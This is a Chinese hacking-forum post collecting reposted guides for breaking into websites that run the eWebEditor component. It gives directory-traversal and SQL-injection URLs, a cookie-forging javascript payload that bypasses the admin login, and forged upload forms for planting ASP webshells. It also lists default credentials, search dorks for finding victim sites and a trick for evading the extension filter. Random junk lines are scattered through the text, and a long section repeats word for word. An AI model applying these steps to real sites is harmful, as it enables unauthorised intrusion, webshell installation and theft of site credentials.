中国网络渗透测试联盟
标题:
Ewebeditor漏洞2
[打印本页]
作者:
admin
时间:
2012-9-13 17:00
标题:
Ewebeditor漏洞2
eWebEditor.asp?id=45&style=standard1 样式调用
4 B5 D+ l+ a2 c- X) y
" I) Z" K* g! r( j% K
3 \" C, L5 r. B* d6 M ~
/edit/admin_uploadfile.asp?id=14&dir=../../..
8 P G0 M3 d: Q
可以浏览网站目录 ../自己加或者减
4 ^, Y: i: S6 P
8 b- e, h9 Q* ~' j( N3 W9 F% G
有次无意的入侵使我发现了ewebeditor2.7.0版本的存在注入漏洞
4 g ]8 I4 P5 I5 c. ~1 e
简单利用就是
2 L! X$ y: y1 |. Q
http://site/path/ewebeditor/ewebeditor.asp?id=article_content&style=full_v200
2 U3 f- L- x7 d: [) Z& U3 `3 m1 }
http://www.siqinci.com/ewebedito
... amp;style=full_v200
; M U$ m; b) E. s S1 }0 `- Z% [
可以利用nbsi进行猜解,对此进行注入
: W1 ]8 \! r7 q# ^- i! g
还有的时候管理员不让复制样式,但是你又看到有个样式被别人以前入侵修改了存在asa或者之类可以传shell,但是上传插入工具没有,又无法修改怎么办那?也许很多人说应该可以加工具栏,但是我就遇见过不让加的
- \1 I1 ]# A1 _5 F5 X6 E8 ]5 }/ {, p; m
这样我们可以利用ewebeditor里的upload.asp文件进行本地构造进行上传具体如下:
+ E5 r1 H) X( t/ O; n* q
在action下面
' ]- H) {- @7 o7 M8 Y
<form action="http://*********/edit/upload.asp?action=save&type=ASA&style=test" method=post name=myform enctype="multipart/form-data">
1 i5 ~$ H m6 Z' u* |$ G0 g
<input type=file name=uploadfile size=1 style="width:100%" onchange="originalfile.value=this.value">
; x& }9 W) t' K; N: d, Z
<input type="submit" name="uploadfile" value="提交">
" A, H6 ^% d) l
<input type=hidden name=originalfile value="">
8 ^3 r: G0 _; h" e4 ?$ V
</form>
' D8 S3 \7 r1 Y- m' j/ {7 ~
------------------------------------------------------------------------------------------------------------------------------------------------
6 O0 O" i" k4 l. p0 ^0 }0 a7 I# W
<input type="submit" name="uploadfile" value="提交"> 放在action后头
' l# \. |8 s. `, [- ?! V- J6 s
,适合用于在ewebeditor后台那个预览那里出来的 比如上传图片那里,有些时候上传页面弹不出来,就可以用upload.asp?action=save&type=ASA&style=test 这个本地来提交,不过这个东西还是要数据库里上传类型有ASA才可以传得上。
( Q+ x# P6 P, @9 [9 a
, L4 \. i$ M5 x# b) ]6 {5 J
& m; H4 }! o Y/ {0 E& O
$ K" w4 F2 G; h( V+ `" G
$ |- v* T, g) \/ Q) `
Ewebeditor最新漏洞及漏洞大全[收集] (图)
z0 T# N; Q* l$ A0 B! [2 W
本帖最后由 administrator 于 2009-7-7 21:24 编辑
k& M4 L, V5 E q3 Y9 L- V
3 s# A5 K, f( D
以下文章收集转载于网络
& {$ V+ {) m+ W& N1 K3 M6 y _- C( N7 G
#主题描述# ewebeditor 3.8漏洞[php]
; P( k. L) V& U+ v ]: v' K) S
--------------------------------------------------------------------------------------------
) ~7 G! r- C1 B0 n# B g
#内容#
0 F4 N! \9 p( s! |
php版ewebeditor 3.8的漏洞
4 _/ q1 o) V) Y- J3 N# u5 S
php版本后台是调用../ewebeditor/admin/config.php,大家去看下源码就知道,在这里我说说利用方法:
* y2 s3 H. X. d# a& c
1 首先当然要找到登陆后台,默认是../eWebEditor/admin/login.php,进入后台后随便输入一个用户和密码,当然会提示出错了,必须是出错的时候,然后这时候你清空浏览器的url,然后输入 javascript:alert(document.cookie=”adminuser=”+escape(”admin”)); javascript:alert(document.cookie=”adminpass=”+escape(”admin”)); javascript:alert(document.cookie=”admindj=”+escape(”1″));后三次回车,
- ~, v6 z8 |6 |' \6 n
2 然后输入正常情况才能访问的文件../ewebeditor/admin/default.php就可以进后台了
% o2 |* J% N- P* A6 D# W# b; D: i, q
3 后面的利用和asp一样,新增样式修改上传,就ok了
: b( o2 O" y$ L2 h
测试一下asp 2.8版本的,竟然一样可以用,爽,看来asp版的应该可以通杀(只测试2.8的,貌似2.8是最高版本的)
& b" a+ W6 o% S9 o2 e
aspx的版本../ewebeditor/admin/upload.aspx添好本地的cer的Shell文件,在浏揽器输入javascript:lbtnUpload.click();就能得到shell
* \/ q% ~5 \- ~! U% z. @
jsp的上传漏洞以及那个出了N久了,由于没有上传按钮,选择好要上传的shell,直接回车就可以了
* q0 F4 Y, g; t5 ?
--------------------------------------------------------------------------------------------
3 R5 o4 b# K+ d6 Z% S; N
. x3 n3 Q& w9 w. Z) X! x% D0 r, ?
2 i6 H& t6 G5 O1 @
算是比较全面的ewebeditor编辑器的漏洞收集,现在的网站大多数用的都是ewebeditor编辑器,所以ewebeditor漏洞的危害性还是相当大的,做了一下漏洞收集,漏洞修补的方法可去网上查找。
1 f; |# B D, w5 ]' z; P+ n6 c
) z+ ]2 t- \1 M% V @- j& z; ^
漏洞更新日期TM: 2009 2 9日 转自zake’S Blog
' b5 R5 g6 p7 ^0 g# h
ewebeditor最新漏洞。这个程序爆漏洞一般都是直接上传的漏洞,首先在本地搭建一个ASP环境重命名一个木马名字例如:1.gif.asp这样的就OK了
" S5 h, o( B" G/ l+ P
那么接下来完美本地搭建一个环境你可以用WEB小工具搭建一个,目的就是让远程上传。/pic/3/a2009-6-4-7341a1.gif.asp搭建好了 ,在官方的地方执行网络地址
K% ^( y6 S# R+ _8 f" s+ H
) t1 k& U+ s W5 G+ \5 ^
7 J+ I$ _: ^& V
然后确定以后,这里是最关键的一部!
: ~" e" E0 ~0 n
这里点了远程上传以后,再提交得到木马地址
) s! V0 W9 I* E9 z+ t
由于官方在图片目录做了限制 导致不能执行ASP脚本而没能拿到WEB权限
, o& Z& l4 V) L. Q) Y
属于安全检测漏洞版本ewebeditor v6.0.0
) C! @! u/ l5 ^! V f. T
+ Q7 V0 Y6 y0 l
以前的ewebeditor漏洞:
+ u. x$ R/ x: J# C: Z
) v& G$ A6 M/ y% A. Y( f4 E/ j/ M" E' s
ewebeditor注入漏洞
2 V' X5 x1 X7 ?
: R! d) }9 F, g' w$ H! f3 q
大家都知道ewebeditor编辑器默认的数据库路径db/ewebeditor.mdb
1 U5 d; `2 y7 d# d: K
默认后台地址是admin_login.asp,另外存在遍历目录漏洞,如果是asp后缀的数据库还可以写入一句话
6 p/ ^% u) v2 j6 }) L0 `% u. C
今天我给大家带来的也是ewebeditor编辑器的入侵方法
$ o, f% i" J' I: F. u. ]: Q) \: p5 k% T
不过一种是注入,一种是利用upload.asp文件,本地构造
2 Z2 |0 l+ R0 \
NO1:注入
1 p% f$ U& y2 s9 j l9 @* S# i1 Z
http://www.XXX.com/ewebeditor200
... amp;style=full_v200
7 s6 {: N" Y3 \/ _0 E2 [
编辑器ewebedior7以前版本通通存在注入
+ i. P5 U) l* e# f% ?
直接检测不行的,要写入特征字符
/ O, a+ N e- @) l
我们的工具是不知道ewebeditor的表名的还有列名
- v: a) G- V0 y' L/ I
我们自己去看看
6 ~8 n! V3 z! G; Z' w8 y0 V4 k. Z
哎。。先表吧
( H3 I# L4 U* P5 g& R
要先添加进库
0 X1 X9 \: \, _; |5 b
开始猜账号密码了
' G( p" l! Q& h# D' j( v& A
我们==
- X0 w- d" S' V/ w/ g
心急的往后拉
, S' g/ r& J! O- `4 z0 q
出来了
$ e8 e7 O7 Y( R5 m: e
[sys_username]:bfb18022a99849f5 chaoup[sys_userpass]:0ed08394302f7d5d 851120
- ]7 a4 I3 X. ], K. l% t
对吧^_^
/ u4 L; [$ e' S2 u* T4 l& A4 ]; m
后面不说了
7 y1 T' ]( V1 G# l
NO2:利用upload.asp文件,本地构造上传shell
# y4 n2 A4 h4 F8 d; w7 F1 V
大家看这里
2 _" U* S4 x3 Q+ v3 }
http://www.siqinci.com/ewebedito
... lepreview&id=37
! C, M; n9 E+ q7 m4 O# t
如果遇见这样的情况又无法添加工具栏是不是很郁闷
- k5 h! @; N/ p9 ]% S& ], J5 s
现在不郁闷了,^_^源源不一般
; Q- a/ M- R9 l- T( h
我们记录下他的样式名“aaa”
5 b$ s) T' _( l+ C/ a$ v# k7 H Z; W
我已经吧upload.asp文件拿出来了
2 D/ [- }6 c- ?
我们构造下
`* H# u& a2 i; L% C) f
OK,我之前已经构造好了
4 d0 o( k3 }! R4 c' I) H
其实就是这里
1 X, H1 `7 H9 s7 n
<form action=”地址/path/upload.asp?action=save&type=&style=样式名” method=post name=myform enctype=”multipart/form-data”>
4 N* |& Q& {7 Q$ u8 @& S$ o4 l
<input type=file name=uploadfile size=1 style=”width:100%”>
K- _; u& I, T+ L l# B
<input type=submit value=”上传了”></input>
* K: C/ g2 Q3 i# c
</form>
. M V6 J; X3 n: l( W6 [
下面我们运行他上传个大马算了
: H! X- H( J# V1 W4 j1 P
UploadFile上传进去的在这个目录下
& S1 g7 P( c: y
2008102018020762.asa
9 [0 V- W+ n- z8 \+ W" n9 v. G
4 j* Y( d* H6 z( S
过往漏洞:
* W6 t# v# T! a: d0 @
6 N* k# m$ n8 ~- E1 B
首先介绍编辑器的一些默认特征:
4 h$ M) E/ d: ^
默认登陆admin_login.asp
) |; i. F. B" i K% s" A! _: S
默认数据库db/ewebeditor.mdb
2 b& Z1 n& t" y( r2 G# B& Y9 y
默认帐号admin 密码admin或admin888
! e) d/ ^# f* h
搜索关键字:”inurl:ewebeditor” 关键字十分重要
6 B( f, ^% K8 _' |+ @, y
有人搜索”eWebEditor - eWebSoft在线编辑器”
4 D( M! I$ d$ P- d5 P5 P3 |* ]; y" Z# t- J
根本搜索不到几个~
5 a3 N" R( h: Z. e0 ~* B" o
baidu.google搜索inurl:ewebeditor
! M$ Z, G: C3 X
几万的站起码有几千个是具有默认特征的~
+ k( _2 E; a; }( `1 L7 C
那么试一下默认后台
# O" p9 s7 l$ j7 \- V6 v: G
http://www.xxx.com.cn/admin/ewebeditor/admin_login.asp
) a' @' p7 c) x' W M/ h
试默认帐号密码登陆。
. f- T/ f1 t! k
利用eWebEditor获得WebShell的步骤大致如下:
9 }; {! r- k; ?( c4 ]* t
1.确定网站使用了eWebEditor。一般来说,我们只要注意发表帖子(文章)的页面是否有类似做了记号的图标,就可以大致做出判断了。
1 N1 d i/ i4 P# w& L. [6 b
2.查看源代码,找到eWebEditor的路径。点击“查看源代码”,看看源码中是否存在类似“<iframe ID=’eWebEditor1′ src=’/edit/ewebeditor.asp?id=content&style=web’ frameborder=0 scrolling=no width=’550′ HEIGHT=’350′></iframe>”的语句。其实只有发现了存在这样的语句了,才可以真正确定这个网站使用了 eWebEditor。然后记下src=’***’中的“***”,这就是eWebEditor路径。
0 y( j; {2 d* w
3.访问eWebEditor的管理登录页面。eWebEditor的默认管理页面为admin_login.asp,和ewebeditor.asp在同一目录下。以上面的路径为例,我们访问的地址为:http://www.***.net/edit/admin_login.asp,看看是否出现了登录页面。
7 {/ K0 F+ P6 ?0 I( Y7 ]
如果没有看到这样的页面,说明管理员已经删除了管理登录页面,呵呵,还等什么,走人啊,换个地方试试。不过一般来说,我很少看到有哪个管理员删了这个页面,试试默认的用户名:admin,密码:admin888。怎么样?成功了吧(不是默认账户请看后文)!
. l5 P0 C: v# }+ }) |; ?# v. ]
4.增加上传文件类型。点击“样式管理”,随便选择列表中底下的某一个样式的“设置,为什么要选择列表中底下的样式?因为eWebEditor自带的样式是不允许修改的,当然你也可以拷贝一个新的样式来设置。
! K; ?: c# j& F& R5 m- n* t1 P6 |+ ]
然后在上传的文件类型中增加“asa”类型。
2 Q( [! ?9 H0 L% r5 c
5.上传ASP木马,获得WebShell。接下来将ASP木马的扩展名修改为asa,就可以简单上传你的ASP木马了。不要问我怎么上传啊,看到 “预览” 了吗?点击“预览”,然后选择“插入其它文件”的按钮就可以了。
; n6 K5 E2 u. C; E9 @* s, J
漏洞原理
" M1 G: r4 L4 Q( [3 ]2 f
漏洞的利用原理很简单,请看Upload.asp文件:
: L. C% n2 `, h) r1 s4 I6 g' T
任何情况下都不允许上传asp脚本文件
* i% ~* b( n; i D2 B
sAllowExt = Replace(UCase(sAllowExt), “ASP”, “”)
4 E* A' h* i& R% l: E0 ?( Q
因为eWebEditor仅仅过滤了ASP文件。记得我第一次使用eWebEditor时就在纳闷:既然作者已经知道asp文件需要过滤,为什么不同时过滤asa、cer等文件呢?也许这就是对免费用户不负责任的表现吧!
3 e" p/ K" z3 D( w8 E/ T* ~) c
高级应用
. K2 t6 P* @( q
eWebEditor的漏洞利用还有一些技巧:
6 d2 c( c: R. n+ E
1.使用默认用户名和密码无法登录。
3 N2 K; \5 S# t6 L" Q, J. R
请试试直接下载db目录下的ewebeditor.mdb文件,用户名和密码在eWebEditor_System表中,经过了md5加密,如果无法下载或者无法破解,那就当自己的运气不好了。
. B% K' z. h5 t g
2.加了asa类型后发现还是无法上传。
' b2 j' T8 j1 B8 A7 @$ v
应该是站长懂点代码,自己修改了Upload.asp文件,但是没有关系,按照常人的思维习惯,往往会直接在sAllowExt = Replace(UCase(sAllowExt), “ASP”, “”)一句上修改,我就看见过一个站长是这样修改的:
# i5 m& h- n. L$ F4 V+ a0 b9 }4 Y
sAllowExt = Replace(Replace(Replace(Replace(Replace(UCase(sAllowExt), “ASP”, “”), “CER”, “”), “ASA”, “”), “CDX”, “”), “HTR”, “”)
# R; N! x$ u8 j* u& s" g; v
猛一看什么都过滤了,但是我们只要在上传类型中增加“aaspsp”,就可以直接上传asp文件了。呵呵,是不是天才的想法?“aaspsp”过滤了 “asp”字符后,反而变成了“asp”!顺便告诉大家一个秘密,其实动网论坛7.0 sp2中也可以利用类似的方法绕过对扩展名的过滤。
/ B8 M1 Z% X4 k/ G& S5 p4 s
3.上传了asp文件后,却发现该目录没有运行脚本的权限。
' M$ v) Z7 [$ i6 ?
呵呵,真是好笨啊,上传类型可以改,上传路径不是也可以修改的吗?仔细看看图四。
' P1 v5 ?3 l6 \. o+ L, h
4.已经使用了第2点中的方法,但是asp类型还是无法上传。
: e( m8 H+ b5 x; J5 D* L
看来站长肯定是一个写asp的高手,但是我们还有最后一招来对付他:看到图三中的“远程类型”了吗?eWebEditor能够设定自动保存远程文件的类型,我们可以加入asp类型。但是如何才能让远程访问的asp文件能够以源码形式保存呢?方法是很多的,最简单的方法是将IIS中的“应用文件映射”中的 “asp”删除。
9 ?' G& |8 V. Y+ `
后记
6 ^ q5 T) x8 n) U
根据自己的经验,几乎只要能进入eWebEditor的后台管理,基本上都可以获得WebShell。在Google上搜索 “ewebeditor.asp?id=”能够看到长达十多页的相关信息,我大致抽查了其中几个,发现成功率约为50%。还不错吧?oblg 2.52版以前的版本也是使用eWebEditor,可以去搜索几个来练练手。要命的是eWebEditor的官方网站和帮助文件中根本没有这方面的安全提示。还有,我发现官方提供的测试系统并不存在类似的漏洞,看来不是他们不知道,而是没有把免费用户的网络安危放在心上!
3 f8 M' L6 f! \7 l
基本入侵基础漏洞
" i& l U$ Z& X0 r6 M1 t
eWebEditor 漏洞
\6 w* R7 l: m" h, c$ u
. R4 i3 l' c0 p
各位站长在使用eWebEditor的时候是否发现,eWebEditor配置不当会使其成为网站中的隐形炸弹呢?第一次发现这漏洞源于去年的一次入侵,在山穷水尽的时候发现了eWebEditor,于是很简单就获得了WebShell。后来又有好几次利用eWebEditor进行入侵的成功经历,这才想起应该写一篇文章和大家共享一下,同时也请广大已经使用了eWebEditor的站长赶紧检查一下自己的站点。要不然,下一个被黑的就是你哦!
9 Z4 q6 V$ b% D. d9 Z' Y! x' C4 X
5 ?' R( E+ u& R" L+ K
漏洞利用
; r# A/ K' y9 T+ G
利用eWebEditor获得WebShell的步骤大致如下:
1 ?, C j% K8 H& W" H2 n3 O1 K
1.确定网站使用了eWebEditor。一般来说,我们只要注意发表帖子(文章)的页面是否有类似做了记号的图标,就可以大致做出判断了。
. ^9 g3 ^: ^& O+ L* E9 l! B
2.查看源代码,找到eWebEditor的路径。点击“查看源代码”,看看源码中是否存在类似“<iframe ID='eWebEditor1' src='/edit/ewebeditor.asp?id=content&style=web' frameborder=0 scrolling=no width='550' HEIGHT='350'></iframe>”的语句。其实只有发现了存在这样的语句了,才可以真正确定这个网站使用了 eWebEditor。然后记下src='***'中的“***”,这就是eWebEditor路径。
2 R2 J- J' J% X( e1 W* U& \+ [- k
3.访问eWebEditor的管理登录页面。eWebEditor的默认管理页面为admin_login.asp,和ewebeditor.asp在同一目录下。以上面的路径为例,我们访问的地址为:http://www.***.net/edit/admin_login.asp,看看是否出现了登录页面。
4 q; Y! Y) n& R4 ], y' X5 s' T
如果没有看到这样的页面,说明管理员已经删除了管理登录页面,呵呵,还等什么,走人啊,换个地方试试。不过一般来说,我很少看到有哪个管理员删了这个页面,试试默认的用户名:admin,密码:admin888。怎么样?成功了吧(不是默认账户请看后文)!
/ e7 t# M% R5 ^5 M
4.增加上传文件类型。点击“样式管理”,随便选择列表中底下的某一个样式的“设置,为什么要选择列表中底下的样式?因为eWebEditor自带的样式是不允许修改的,当然你也可以拷贝一个新的样式来设置。
; ~ w5 l5 P4 G0 i' S0 c
8 n) [+ \6 h: z: e) E2 R( c1 `
然后在上传的文件类型中增加“asa”类型。
* N9 K; r8 |7 v+ `; G4 n! e
* a# O v7 X }
5.上传ASP木马,获得WebShell。接下来将ASP木马的扩展名修改为asa,就可以简单上传你的ASP木马了。不要问我怎么上传啊,看到 “预览” 了吗?点击“预览”,然后选择“插入其它文件”的按钮就可以了。
( i8 [# K* B0 j. m" ~$ T
# e6 _. v" Z8 S0 `: L
& D! |- u/ o' c, }, Z6 R
漏洞原理
5 y( T+ ~ N1 F) s8 g0 P3 \
漏洞的利用原理很简单,请看Upload.asp文件:
( {6 \$ U* [7 U, p. Q0 h9 q
任何情况下都不允许上传asp脚本文件
( S% I! r2 P& ]2 Z! u' a
sAllowExt = replace(UCase(sAllowExt), "ASP", "")
. b- Q+ |7 z7 K8 o' _7 b- n2 x7 K
因为eWebEditor仅仅过滤了ASP文件。记得我第一次使用eWebEditor时就在纳闷:既然作者已经知道asp文件需要过滤,为什么不同时过滤asa、cer等文件呢?也许这就是对免费用户不负责任的表现吧!
# l* o2 B* ?/ Q N+ H' u2 K
" ` R8 C5 U& T9 R
高级应用
. S& n# I, C5 r7 n
eWebEditor的漏洞利用还有一些技巧:
2 ]+ j% d1 y& Y6 K# Y) u" b8 o
1.使用默认用户名和密码无法登录。
( G8 d4 q) V- V! }( z \
请试试直接下载db目录下的ewebeditor.mdb文件,用户名和密码在eWebEditor_System表中,经过了md5加密,如果无法下载或者无法****,那就当自己的运气不好了。
0 n. J. t: Z2 r6 r. d
2.加了asa类型后发现还是无法上传。
# x6 J- {4 _$ t
应该是站长懂点代码,自己修改了Upload.asp文件,但是没有关系,按照常人的思维习惯,往往会直接在sAllowExt = replace(UCase(sAllowExt), "ASP", "")一句上修改,我就看见过一个站长是这样修改的:
5 Z, b: k; K/ d, O! X) _
sAllowExt = replace(replace(replace(replace(replace(UCase(sAllowExt), "ASP", ""), "CER", ""), "ASA", ""), "CDX", ""), "HTR", "")
! m% g; G% q' b7 i/ X1 S- z* M
猛一看什么都过滤了,但是我们只要在上传类型中增加“aaspsp”,就可以直接上传asp文件了。呵呵,是不是天才的想法?“aaspsp”过滤了 “asp”字符后,反而变成了“asp”!顺便告诉大家一个秘密,其实动网论坛7.0 sp2中也可以利用类似的方法绕过对扩展名的过滤。
/ J* V8 }* b$ K4 I3 r
3.上传了asp文件后,却发现该目录没有运行脚本的权限。
6 G" ~: T# ]5 T0 w& G ~, M
呵呵,真是好笨啊,上传类型可以改,上传路径不是也可以修改的吗?仔细看看图四。
& M! Q5 q. e1 r" J& J
4.已经使用了第2点中的方法,但是asp类型还是无法上传。
# D, a6 c/ u1 _7 ~- S) `
看来站长肯定是一个写asp的高手,但是我们还有最后一招来对付他:看到图三中的“远程类型”了吗?eWebEditor能够设定自动保存远程文件的类型,我们可以加入asp类型。但是如何才能让远程访问的asp文件能够以源码形式保存呢?方法是很多的,最简单的方法是将IIS中的“应用文件映射”中的 “asp”删除。
9 S2 d, p, A& [4 @* V" D2 }
6 f( g5 d/ x3 d% L
后记
5 T' Y3 E4 X( e: Y3 M8 s& ]
根据自己的经验,几乎只要能进入eWebEditor的后台管理,基本上都可以获得WebShell。在Google上搜索 “ewebeditor.asp?id=”能够看到长达十多页的相关信息,我大致抽查了其中几个,发现成功率约为50%。还不错吧?oblg 2.52版以前的版本也是使用eWebEditor,可以去搜索几个来练练手。要命的是eWebEditor的官方网站和帮助文件中根本没有这方面的安全提示。还有,我发现官方提供的测试系统并不存在类似的漏洞,看来不是他们不知道,而是没有把免费用户的网络安危放在心上!
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2